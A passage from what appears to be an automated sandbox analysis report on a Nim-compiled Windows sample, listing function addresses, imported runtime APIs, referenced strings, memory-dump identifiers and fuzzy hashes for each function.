Opcode Fuzzy Hash: bf5cc1b277670a267714325ba9559dec80da75ac437d972a0287857624e5941f
Instruction Fuzzy Hash: 93410DF19042098EEB10AF64D5443BDB7B0BB05318F199A29D1ACBF2D1C7794984DF43

Function 00EE75E1 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 87COMMON

Download Yara Rule

APIs

CoInitialize.OLE32 ref: 00EE7611
VariantCopy.OLEAUT32 ref: 00EE765F

Strings

toVariant, xrefs: 00EE76F0
com.nim, xrefs: 00EE76E8
VariantConversionError, xrefs: 00EE768D, 00EE76D9

Memory Dump Source

Source File: 00000000.00000002.2960994897.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000000.00000002.2960904847.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961032552.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961062257.0000000000F0D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961087773.0000000000F18000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961121959.0000000000F1C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961147801.0000000000F1D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ee0000_1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae.jbxd

Similarity

API ID: CopyInitializeVariant
String ID: VariantConversionError$com.nim$toVariant
API String ID: 633353902-3035603046
Opcode ID: c8416a82b98a5057c6cf152ea1bc5d0af863284d1ea60cd0391b234fcceae913
Instruction ID: 78a32959cbedd486904d63f38b3018288725dcec8bc7ee9dcc32b66b16d90534
Opcode Fuzzy Hash: c8416a82b98a5057c6cf152ea1bc5d0af863284d1ea60cd0391b234fcceae913
Instruction Fuzzy Hash: 293192B19083899FDB10AFB9C44439ABBE1EF44304F00992DE5C5AB382D7759844EB91

Function 00EE6669 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 87COMMON

Download Yara Rule

APIs

CoInitialize.OLE32 ref: 00EE6699
VariantCopy.OLEAUT32 ref: 00EE66E7

Strings

newVariant, xrefs: 00EE6778
com.nim, xrefs: 00EE6770
VariantConversionError, xrefs: 00EE6715, 00EE6761

Memory Dump Source

Source File: 00000000.00000002.2960994897.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000000.00000002.2960904847.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961032552.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961062257.0000000000F0D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961087773.0000000000F18000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961121959.0000000000F1C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961147801.0000000000F1D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ee0000_1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae.jbxd

Similarity

API ID: CopyInitializeVariant
String ID: VariantConversionError$com.nim$newVariant
API String ID: 633353902-805458017
Opcode ID: 45c9569cd02e96eb8ecedeed44bc9210944f85b4a01c7131488a30f7f9ddb221
Instruction ID: cd71aa8a539d5415e95f01534b2a749452dea23433513188f69acaf203274a55
Opcode Fuzzy Hash: 45c9569cd02e96eb8ecedeed44bc9210944f85b4a01c7131488a30f7f9ddb221
Instruction Fuzzy Hash: 1F31B2B09043899FDB10AFB5C44435EBBF0FF95354F01882EE585AB382D7759844EB91

Function 00F058E1 Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 88COMMON

Download Yara Rule

APIs

calloc.MSVCRT ref: 00F0590F

Strings

, xrefs: 00F05900

Memory Dump Source

Source File: 00000000.00000002.2960994897.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000000.00000002.2960904847.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961032552.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961062257.0000000000F0D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961087773.0000000000F18000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961121959.0000000000F1C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961147801.0000000000F1D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ee0000_1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae.jbxd

Similarity

API ID: calloc
String ID:
API String ID: 2635317215-3916222277
Opcode ID: f65756ecc1919784dff9414ac3e3b7b77ab1357038e3adb49f7eaf2e7ec3b0d8
Instruction ID: d59fe282c27c0e64958ed62c2a0937d7bf2f9426f3feabc5e66e55b1622da18d
Opcode Fuzzy Hash: f65756ecc1919784dff9414ac3e3b7b77ab1357038e3adb49f7eaf2e7ec3b0d8
Instruction Fuzzy Hash: BE414E74E04609DFDB00EFA8C889B9EB7F0FF04714F418959E8A5AB392D7789944EB41

Function 00EE3F9A Relevance: 7.6, APIs: 5, Instructions: 83fileCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?,?,?,?,?,?,00000001,00000000,?,?,00EFA22B), ref: 00EE3FAE
fputc.MSVCRT ref: 00EE403A
fwrite.MSVCRT ref: 00EE408D
fflush.MSVCRT ref: 00EE40A1
LeaveCriticalSection.KERNEL32 ref: 00EE40AD

Memory Dump Source

Source File: 00000000.00000002.2960994897.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000000.00000002.2960904847.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961032552.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961062257.0000000000F0D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961087773.0000000000F18000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961121959.0000000000F1C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961147801.0000000000F1D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ee0000_1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae.jbxd

Similarity

API ID: CriticalSection$EnterLeavefflushfputcfwrite
String ID:
API String ID: 623422050-0
Opcode ID: 8598e995c5b5a34ca18daeaec7858ee6b40204eb54c2f3619594a400cdbbdc31
Instruction ID: db8878f086c08b017ceab5cb2f47987fe0c3a35270e27e260edbcdac2b2ac080
Opcode Fuzzy Hash: 8598e995c5b5a34ca18daeaec7858ee6b40204eb54c2f3619594a400cdbbdc31
Instruction Fuzzy Hash: DD313CB09042099FDB10EFA5C8847ADBBF4EF88304F05952DE584A7352D7B99980EB92

Function 00F0AECB Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 179COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00F0B095

Strings

z, xrefs: 00F0B106

Memory Dump Source

Source File: 00000000.00000002.2960994897.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000000.00000002.2960904847.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961032552.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961062257.0000000000F0D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961087773.0000000000F18000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961121959.0000000000F1C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961147801.0000000000F1D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ee0000_1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae.jbxd

Similarity

API ID: memset
String ID: z
API String ID: 2221118986-1657960367
Opcode ID: 33bec8d43b57326b9a1e5255a4728608ab4f4c0903b179c354d0f6b43994ff92
Instruction ID: 09cb542211aa8bd1bfff6512fa01f339617b54544a2e8a4c88720c237e0965c9
Opcode Fuzzy Hash: 33bec8d43b57326b9a1e5255a4728608ab4f4c0903b179c354d0f6b43994ff92
Instruction Fuzzy Hash: F081927090020ADFDF10CF59C4857AEBBF0BF08355F108519E868AB290D3B9EA95EF95

Function 00F0B3FB Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 157COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00F0B56A

Strings

&, xrefs: 00F0B5E4

Memory Dump Source

Source File: 00000000.00000002.2960994897.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000000.00000002.2960904847.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961032552.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961062257.0000000000F0D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961087773.0000000000F18000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961121959.0000000000F1C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961147801.0000000000F1D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ee0000_1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae.jbxd

Similarity

API ID: memset
String ID: &
API String ID: 2221118986-1010288
Opcode ID: 97417f53290297cc1caa45a986f46549f3145e6d93713e9dbf45f40050e36feb
Instruction ID: 7f0e68a71d7d406c6e54405476eca231807d89a8e01c38e0e4a05ee0db3cd7b8
Opcode Fuzzy Hash: 97417f53290297cc1caa45a986f46549f3145e6d93713e9dbf45f40050e36feb
Instruction Fuzzy Hash: 0371BF7490020ADFDF20CF59C9847AEB7B0FF04324F148569E864AB291D378DA94EF95

Function 00F0B1FD Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 154COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00F0B35E

Strings

&, xrefs: 00F0B3CF

Memory Dump Source

Source File: 00000000.00000002.2960994897.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000000.00000002.2960904847.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961032552.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961062257.0000000000F0D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961087773.0000000000F18000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961121959.0000000000F1C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961147801.0000000000F1D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ee0000_1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae.jbxd

Similarity

API ID: memset
String ID: &
API String ID: 2221118986-1010288
Opcode ID: 9e4d073aa8be4ade6cae661355d0d0f7307d55aeb76e789427c838b067a72e7a
Instruction ID: 66bb00862b93bb8acc895ccb8b9ecb417888a199509cea76777e1cb4eb671006
Opcode Fuzzy Hash: 9e4d073aa8be4ade6cae661355d0d0f7307d55aeb76e789427c838b067a72e7a
Instruction Fuzzy Hash: 2171D07090424ADFDF11CF99C4887AEBBF0EF04365F108519E864AB280D3789A94EFA5

Function 00F06663 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 58COMMON

Download Yara Rule

APIs

fprintf.MSVCRT ref: 00F066B6
fprintf.MSVCRT ref: 00F06701

Strings

C%p %d V=%0X w=%ld %s, xrefs: 00F066F6
C%p %d %s, xrefs: 00F066AB

Memory Dump Source

Source File: 00000000.00000002.2960994897.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000000.00000002.2960904847.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961032552.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961062257.0000000000F0D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961087773.0000000000F18000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961121959.0000000000F1C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961147801.0000000000F1D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ee0000_1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae.jbxd

Similarity

API ID: fprintf
String ID: C%p %d %s$C%p %d V=%0X w=%ld %s
API String ID: 383729395-884133013
Opcode ID: 21cda4cb30bc923e0b722d7d6f4bcd150bdb43ed3a3e0d7222cad11430a33ffc
Instruction ID: a7d73d42695493508235ad997c9a449f0ec452b187dc8b54077b290efb521121
Opcode Fuzzy Hash: 21cda4cb30bc923e0b722d7d6f4bcd150bdb43ed3a3e0d7222cad11430a33ffc
Instruction Fuzzy Hash: 56219374A04305DFCB40DF59E88499ABBF4AB98350F10C52AF998CB361DB74A941EF91

Function 00F057D9 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 55COMMON

Download Yara Rule

APIs

printf.MSVCRT ref: 00F05822
printf.MSVCRT ref: 00F0587C

Strings

RWL%p %d %s, xrefs: 00F0581B
RWL%p %d V=%0X B=%d r=%ld w=%ld L=%p %s, xrefs: 00F05875

Memory Dump Source

Source File: 00000000.00000002.2960994897.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000000.00000002.2960904847.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961032552.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961062257.0000000000F0D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961087773.0000000000F18000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961121959.0000000000F1C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961147801.0000000000F1D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ee0000_1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae.jbxd

Similarity

API ID: printf
String ID: RWL%p %d %s$RWL%p %d V=%0X B=%d r=%ld w=%ld L=%p %s
API String ID: 3524737521-1971217749
Opcode ID: 702a31ca680b6a7795406131e76629e502cbd8b4cbaf0075588408f7536eef23
Instruction ID: f854a6ce351a26efab6dc65f1ddba5ed46519e73ba50e679ffe4d185adcdd679
Opcode Fuzzy Hash: 702a31ca680b6a7795406131e76629e502cbd8b4cbaf0075588408f7536eef23
Instruction Fuzzy Hash: 7421B474A08704AFCB00DF59D48065ABBE0FB88754F10C86AF899CB360D774E940AF82

Function 00F02B99 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 53COMMON

Download Yara Rule

APIs

printf.MSVCRT ref: 00F02BD9
printf.MSVCRT ref: 00F02C2F

Strings

T%p %d %s, xrefs: 00F02BD2
T%p %d V=%0X H=%p %s, xrefs: 00F02C28

Memory Dump Source

Source File: 00000000.00000002.2960994897.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000000.00000002.2960904847.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961032552.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961062257.0000000000F0D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961087773.0000000000F18000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961121959.0000000000F1C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961147801.0000000000F1D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ee0000_1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae.jbxd

Similarity

API ID: printf
String ID: T%p %d %s$T%p %d V=%0X H=%p %s
API String ID: 3524737521-2059990036
Opcode ID: 9b15409ad81e8d55041f2c60926286dc6776da3090aacdce615bc07236718bef
Instruction ID: 5706d5a8e61cfe11fadb2a735ad2f3fbc44658dca6de7a561ce6ee517488428a
Opcode Fuzzy Hash: 9b15409ad81e8d55041f2c60926286dc6776da3090aacdce615bc07236718bef
Instruction Fuzzy Hash: 2511FE705083049FDB50EF69D98494ABBE4EF89350F11C929F888C7350D774D980EBA2

Function 00F0112D Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 20stringCOMMON

Download Yara Rule

APIs

setlocale.MSVCRT ref: 00F01142
strchr.MSVCRT ref: 00F01152
atoi.MSVCRT ref: 00F01169

Strings

., xrefs: 00F01147

Memory Dump Source

Source File: 00000000.00000002.2960994897.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000000.00000002.2960904847.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961032552.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961062257.0000000000F0D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961087773.0000000000F18000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961121959.0000000000F1C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961147801.0000000000F1D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ee0000_1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae.jbxd

Similarity

API ID: atoisetlocalestrchr
String ID: .
API String ID: 1223908000-248832578
Opcode ID: 913335cb0b85864febce951fc101198b94ac045b3d78c8280c564eefbe26e24a
Instruction ID: 537abc423e1cd24fb12b03cc94793a05c10a1b4aa8aa3914f1217c391aa27a01
Opcode Fuzzy Hash: 913335cb0b85864febce951fc101198b94ac045b3d78c8280c564eefbe26e24a
Instruction Fuzzy Hash: FDE09A70804304ABD714BFA5D84A35DB7F4BB00348F00885CE080DB2C2D67C9484FB86

Function 00F0AC8A Relevance: 6.2, APIs: 3, Strings: 1, Instructions: 171COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00F0AE37

Strings

z, xrefs: 00F0AE9F

Memory Dump Source

Source File: 00000000.00000002.2960994897.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000000.00000002.2960904847.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961032552.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961062257.0000000000F0D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961087773.0000000000F18000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961121959.0000000000F1C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961147801.0000000000F1D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ee0000_1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae.jbxd

Similarity

API ID: memset
String ID: z
API String ID: 2221118986-1657960367
Opcode ID: 0f480dde8c9652c92a97bf27d2d1770a53d0c43e0074a90f2a354a8b5f3358f0
Instruction ID: 857cae4880d7e4927f95aa9c97ea59cb0b2c50bddfd9048d8105ddbc23c92080
Opcode Fuzzy Hash: 0f480dde8c9652c92a97bf27d2d1770a53d0c43e0074a90f2a354a8b5f3358f0
Instruction Fuzzy Hash: 87817F7090030ADFDF11CF59C4847AEBBF1AB44355F148519E858AB390D378EA95EF92

Function 00F03527 Relevance: 6.1, APIs: 4, Instructions: 110COMMON

Download Yara Rule

APIs

realloc.MSVCRT ref: 00F0357C
realloc.MSVCRT ref: 00F035B2

Memory Dump Source

Source File: 00000000.00000002.2960994897.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000000.00000002.2960904847.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961032552.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961062257.0000000000F0D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961087773.0000000000F18000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961121959.0000000000F1C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961147801.0000000000F1D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ee0000_1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae.jbxd

Similarity

API ID: realloc
String ID:
API String ID: 471065373-0
Opcode ID: 94471a85d24445aa736d0a5e051881bbe0c98b6d8f5f08a2ded4814bdb816338
Instruction ID: e56a14ad0a1cf57da1c51f56e89e781697a7f1b5d8008680c0a0173d7588d5d4
Opcode Fuzzy Hash: 94471a85d24445aa736d0a5e051881bbe0c98b6d8f5f08a2ded4814bdb816338
Instruction Fuzzy Hash: B95193B4A0421A8FCB00DFA8C985AAEB7F0FF48304F558969E858EB355D734E941DF51

Function 00EE1006 Relevance: 6.0, APIs: 4, Instructions: 28COMMON

Download Yara Rule

APIs

__set_app_type.MSVCRT ref: 00EE1026
__set_app_type.MSVCRT ref: 00EE1034
__p__fmode.MSVCRT ref: 00EE1039
__p__commode.MSVCRT ref: 00EE1046

Memory Dump Source

Source File: 00000000.00000002.2960994897.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000000.00000002.2960904847.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961032552.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961062257.0000000000F0D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961087773.0000000000F18000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961121959.0000000000F1C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961147801.0000000000F1D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ee0000_1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae.jbxd

Similarity

API ID: __set_app_type$__p__commode__p__fmode
String ID:
API String ID: 2522132747-0
Opcode ID: 0b4d1ce9bfc3ea28e4e31f7a052b66651dc33827074dfa411c69a1a015b8220e
Instruction ID: 4cce61f92373daaa595b64f9e18c63dacd368f0895e95cfd42a3518f88f772f4
Opcode Fuzzy Hash: 0b4d1ce9bfc3ea28e4e31f7a052b66651dc33827074dfa411c69a1a015b8220e
Instruction Fuzzy Hash: D7F012B02002888BD340BFA9D98237E77E5AB40344F129565D4849B393DF79D8C2F7A3

Function 00EE42C0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 108windowCOMMON

Download Yara Rule

APIs

FormatMessageW.KERNEL32 ref: 00EE434B
LocalFree.KERNEL32 ref: 00EE4380

Strings

OSError, xrefs: 00EE42EF

Memory Dump Source

Source File: 00000000.00000002.2960994897.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000000.00000002.2960904847.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961032552.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961062257.0000000000F0D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961087773.0000000000F18000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961121959.0000000000F1C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961147801.0000000000F1D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ee0000_1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae.jbxd

Similarity

API ID: FormatFreeLocalMessage
String ID: OSError
API String ID: 1427518018-4278961375
Opcode ID: 2cb05c07912136c38e69bc028c488f47c5c360fd9f0a708ebd85dd201c9d45be
Instruction ID: c5760108e98596e6dc621d4652e9d54aa04f2b8721e094769e7b2f0db0fdb6f9
Opcode Fuzzy Hash: 2cb05c07912136c38e69bc028c488f47c5c360fd9f0a708ebd85dd201c9d45be
Instruction Fuzzy Hash: 08414BB0A042898FDB00EF6AC8847AEFBF5FF98304F149559E844AB391D774C845DBA1

Function 00F02D01 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64COMMON

Download Yara Rule

APIs

free.MSVCRT ref: 00F02D9D
fprintf.MSVCRT ref: 00F02DC4

Strings

%p not found?!?!, xrefs: 00F02DB9

Memory Dump Source

Source File: 00000000.00000002.2960994897.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000000.00000002.2960904847.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961032552.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961062257.0000000000F0D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961087773.0000000000F18000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961121959.0000000000F1C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961147801.0000000000F1D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ee0000_1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae.jbxd

Similarity

API ID: fprintffree
String ID: %p not found?!?!
API String ID: 92069018-11085004
Opcode ID: 419cc6e492abf3e2059c478a23ebd6ebe270f8a57f8ef653f64568f72577c1d0
Instruction ID: 1639bc04bf733332e3306288dd2829ad18a96c19bd6ccaa0dbfeba12d422c1ad
Opcode Fuzzy Hash: 419cc6e492abf3e2059c478a23ebd6ebe270f8a57f8ef653f64568f72577c1d0
Instruction Fuzzy Hash: 8D21B474905209DFCB40EF99C488AADBBF0BF48354F05C959E8949B3A1D774E980EF91

Function 00EE1EA9 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45COMMON

Download Yara Rule

APIs

VirtualFree.KERNEL32 ref: 00EE1F13
exit.MSVCRT ref: 00EE1F33

Strings

virtualFree failing!, xrefs: 00EE1F20

Memory Dump Source

Source File: 00000000.00000002.2960994897.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000000.00000002.2960904847.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961032552.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961062257.0000000000F0D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961087773.0000000000F18000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961121959.0000000000F1C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961147801.0000000000F1D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ee0000_1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae.jbxd

Similarity

API ID: FreeVirtualexit
String ID: virtualFree failing!
API String ID: 1212090140-3108117800
Opcode ID: 345bbea2bff1895aa43dbc116ab3f6045c019be3673bbedbfce0d411bd80cd0d
Instruction ID: 7b452db5003089f4794154c0457244943cba10c18db65cc05261d96a5f98fcb1
Opcode Fuzzy Hash: 345bbea2bff1895aa43dbc116ab3f6045c019be3673bbedbfce0d411bd80cd0d
Instruction Fuzzy Hash: E101D475A042048FDB00AF6AD8843DDBBE4FF85318F0481BAEC488B256D7714489CBA2

Function 00EFA5F0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 41COMMON

Download Yara Rule

APIs

fprintf.MSVCRT ref: 00EFA6A0

Strings

